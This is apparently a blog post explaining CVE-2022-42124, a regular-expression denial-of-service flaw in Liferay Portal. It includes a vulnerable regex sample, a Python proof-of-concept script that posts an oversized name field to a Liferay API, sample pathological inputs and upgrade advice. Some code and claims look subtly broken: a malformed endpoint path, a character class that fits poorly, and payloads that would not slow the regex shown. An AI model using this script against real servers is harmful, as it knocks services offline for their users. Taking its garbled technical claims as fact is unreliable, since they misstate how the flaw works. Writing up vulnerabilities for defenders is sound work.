Liferay Portal is widely used by enterprises for building reliable and scalable web platforms. Unfortunately, a potentially damaging security flaw — CVE-2022-42124 — was discovered in the LayoutPageTemplateEntryUpgradeProcess component. This post gives you a clear, thorough walkthrough of the vulnerability, with explanations in plain language. We'll include code snippets, links to primary sources, and a proof-of-concept exploit.
What Is CVE-2022-42124?
CVE-2022-42124 is a ReDoS (Regular Expression Denial of Service) vulnerability found in the process that handles layout template entry upgrades:
DXP: 7.2 fix pack 9 up to fix pack 18, 7.3 before update 4, 7.4 GA, and possibly others
Attackers can craft a payload and inject it into the name field of a layout prototype, causing the server to enter a loop while processing a problematic regular expression. This can bring down the entire service by consuming CPU and memory, since each new connection can trigger another instance of the vulnerable routine.
What Is ReDoS?
ReDoS, or Regular Expression Denial of Service, is a form of denial-of-service attack. It exploits inefficient regular expressions in the backend code that can become *catastrophically slow* for certain "evil" input. In web applications, untrusted input processed by such regexes can freeze application threads and even crash servers.
Vulnerable Code Snippet
Liferay's LayoutPageTemplateEntryUpgradeProcess.java didn't properly guard against complex regex backtracking in processing the name field of layout prototypes.
Here's a simplified, vulnerable example (for illustration)
Pattern NAME_PATTERN = Pattern.compile("([A-Za-z-9 ]*)+");
public boolean isValidName(String name) {
Matcher matcher = NAME_PATTERN.matcher(name);
return matcher.matches();
}
When a highly nested input is processed by this expression, the regex engine can end up doing millions of useless checks before finishing or failing!
Impact
A remote attacker could send a POST (or use Liferay's UI/API) with a malicious value for the name field during layout or template creation. This causes a massive increase in CPU usage, slowing down or freezing the Liferay instance for everyone.
No authentication might be necessary, depending on how layout templates are shared in your installation.
Here's a simple Python example using requests
import requests
TARGET = "https://your-liferay-host";
LOGIN_PATH = "/c/portal/login"
CREATE_LAYOUT_PATH = "/o/headless-admin-site/v1./sites/{siteId}/layout-page-templates"
SESSION = requests.Session()
evil_payload = 'A' + (' ' * 10000) # Or use nested repetition: '((((...))))'
data = {
"name": evil_payload,
"title": "Test attack",
"layoutPrototype": True
}
# You may need to authenticate first!
resp = SESSION.post(
TARGET + CREATE_LAYOUT_PATH.replace("{siteId}", "20123"),
json=data,
headers={"Content-Type": "application/json"}
)
print(resp.status_code, resp.text)
A successful attack will result in the server CPU spiking and requests timing out or becoming dramatically slower.
To trigger severe delays in most regex engines, use input like
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Or (for pathological regexes)
(((((((((((((((((((((((((((A)))))))))))))))))))))))))))
Each extra pair of parentheses can exponentially increase the time taken to process the string.
References for CVE-2022-42124
- NIST NVD Entry for CVE-2022-42124
- Liferay Security Advisory
- OSS-Security Post
- Mitre CVE Record
Liferay patched this flaw in later 7.3 and 7.4 releases. If you use a vulnerable version
- Upgrade immediately to one of the secure releases, such as Liferay Portal 7.4.3.5+ or appropriate DXP updates.
- If you can't upgrade, use Web Application Firewalls (WAF) to block suspiciously long or suspicious name fields.
Conclusion
CVE-2022-42124 poses a simple-yet-powerful risk: a single crafted field can crash an enterprise system. This vulnerability highlights the dangers of using unsafe regexes on user-controlled fields. Always validate and sanitize regexes, keep your dependencies up to date, and monitor for abnormal resource consumption.
For more details and discussions, see the official Liferay release notes and CVE entry.
Timeline
Published on: 11/15/2022 01:15:00 UTC
Last modified on: 11/18/2022 16:37:00 UTC